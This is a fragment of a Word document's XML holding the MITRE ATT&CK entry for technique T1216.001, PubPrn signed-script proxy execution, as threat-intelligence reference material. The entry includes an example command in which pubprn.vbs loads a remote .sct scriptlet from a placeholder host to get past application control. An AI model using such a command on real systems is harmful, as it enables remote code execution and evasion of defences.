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T1216.001</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>TTP Information</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Name: PubPrn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Description: Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via &lt;code&gt;Cscript.exe&lt;/code&gt;. For example, the following code publishes a printer within the specified domain: &lt;code&gt;cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com&lt;/code&gt;.(Citation: pubprn)</w:t>
        <w:br/>
        <w:br/>
        <w:t>Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second &lt;code&gt;script:&lt;/code&gt; parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is &lt;code&gt;pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct&lt;/code&gt;. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.</w:t>
        <w:br/>
        <w:br/>
        <w:t>In later versions of Windows (10+), &lt;code&gt;PubPrn.vbs&lt;/code&gt; has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to &lt;code&gt;LDAP://&lt;/code&gt;, vice the &lt;code&gt;script:&lt;/code&gt; moniker which could be used to reference remote code via HTTP(S).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APT32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